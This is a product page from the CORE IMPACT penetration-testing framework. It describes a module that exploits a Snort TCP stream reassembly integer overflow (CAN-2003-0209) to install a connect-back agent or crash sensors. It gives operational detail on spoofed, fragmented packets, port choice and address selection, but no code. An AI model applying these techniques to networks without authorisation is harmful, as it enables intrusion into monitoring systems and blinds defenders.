CORE IMPACT - Support :: The First Penetration Testing Framework

Snort TCP Stream Integer Overflow v1.21

Vulnerability exploited: CAN-2003-0209 - BID-7178

Category: Exploits/Remote

This module exploits an integer overflow in the Snort TCP stream reassembly module.
This module exploits a vulnerable Snort sensor and installs an agent which connects back to the Impact console. If the attack is successful, a new host will appear in the entity view with an installed agent. Although you can often use this module by simply dragging and dropping it onto a host, it is important to understand how it functions and think about the most appropriate way to use it in your situation. To function this module needs a destination address and a source address. The destination address is the address of the host that you drop the module onto. The source address is by default 0.0.0.0 in the module configuration. If you do not change this, the module will attempt to find another host in the same /24 network as the destination host to use for the source address. If a suitable source address can not be found the module will fail and you will need to set this value manually. IMPORTANT: It is necessary that these hosts actually exist because the router will only send packets to IP addresses that answer arp requests with their MAC address. If the hosts do not exist the router will not transmit the packets and a snort sensor running on the same network segment will not see them. This module sends three TCP packets. The first two are very large (~64K) and are fragmented into 64 1K packets. These two packets are sent with the addresses spoofed so that the packet appears to be sent from the source address and port (SOURCE_HOST,SOURCE_PORT) to the destination (TARGET, DESTINATION_PORT). It's important to choose one of the default reassembly ports for either the DESTINATION_PORT or SOURCE_PORT. These are (21, 23, 25, 53, 80, 143, 110, 111, 513). The third packet is sent with the addresses spoofed so that the packet appears to be from the DESTINATION_HOST to the TARGET, as if it was a response from the server to the client. In order for this exploit to function, Snort must see all three packets. Since you probably don't know which computers are running snort sensors, you must make an educated guess where to send the packets to. An example attack might be to send the packets with the addresses of two hosts that exist and are on the target network you are trying to exploit (example: src = 192.168.10.2, dst=192.168.10.3 if 192.168.10.0/24 is your target). This will work against a snort sensor that is monitoring the network 192.168.10.0/24 and it will also work against any upstream snort sensors. This exploit will only exploit Snort sensors running on Linux/86 but it is useful also for crashing and disabling sensors running on any other platform.

Supported Systems:

RedHat Linux 8 (i386)

This module is included in the latest version of CORE IMPACT, the first automated comprehensive penetration testing product for accurately identifying information security risks. Click here to learn more about the product.